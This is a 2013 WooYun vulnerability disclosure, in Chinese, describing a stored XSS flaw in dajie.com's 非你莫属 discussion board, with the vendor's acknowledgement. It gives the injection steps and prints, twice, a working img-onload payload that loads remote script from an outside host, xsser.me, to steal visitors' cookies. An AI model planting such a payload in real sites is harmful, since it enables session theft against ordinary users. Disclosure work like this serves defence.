当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016942

漏洞标题: 大街网 非你莫属官网某板块储存型XSS,可以盗取用户cookie

相关厂商:大杰世纪科技发展(北京)有限公司

漏洞作者: px1624

提交时间:2013-01-05 11:10

修复时间:2013-02-19 11:11

公开时间:2013-02-19 11:11

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-05: 细节已通知厂商并且等待厂商处理中
2013-01-05: 厂商已经确认,细节仅向厂商公开
2013-01-15: 细节向核心白帽子及相关领域专家公开
2013-01-25: 细节向普通白帽子公开
2013-02-04: 细节向实习白帽子公开
2013-02-19: 细节向公众公开

简要描述:

原来非你莫属的官网是大街网给提供的额,在大街网官方的某板块中也找到了几个,不过有限制,要是能突破了再提交。
看了下大街网的漏洞,全是XSS,霸气啊!这里我再加一个。。。

详细说明:

1 百度非你莫属官网,可以看到是大街网的域名。
图1

1.jpg


2 进去之后选择讨论区板块。
图2

2.jpg


3 随便发个帖子,里面插张图,然后点击编辑,抓包。
图3

3.jpg


4 修改post数据构造xss代码
图4

4.jpg


5 可以看到这里的空格会自动解析,所以构造的时候不要加空格。
图5

5.jpg


6 搞定之后用F12查看有么有成功(其实这个是在开始测试的时候就要看能不能插入,有么有过滤)
图6 7

6.jpg


7.jpg


复制到外部txt中的代码(新手请不要直接在那里看,一定要用Copy as HTML复制出来看,因为那里看到的是解析过的,大牛可以用颜色区分)

<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">


7 大功告成的效果,看起来一个很正常的帖子,点击就中招了。
图8 9

8.jpg


9.jpg


END

漏洞证明:

1 测试地址,自己看,看完删掉。http://fnms.dajie.com/fnms/discuss/topic/162281/detail
2 构造后的恶意代码。

<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xsser.me/Du8ka9?'+Math.random();document.body.appendChild(s)" border="0">


3 附一张霸气的图,大街网目前9个漏洞都是XSS,霸气啊!本人习惯,挖一个网站之前,先在乌云看下厂商之前的漏洞。希望大街网可以对安全重视,100%的XSS漏洞已经很能说明问题了。

QQ截图20130105110129.jpg

修复方案:

过滤

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-01-05 11:20

厂商回复:

感谢您对大街网的大力支持,我们会尽快出来,以后尽量避免类似漏洞的发生,谢谢~另外,新年之际,我们准备了一些新年礼物来感谢关心我们的白帽子们,请将您的具体联系信息发送给我们,我们会在近期将礼物寄送给您。

最新状态:

暂无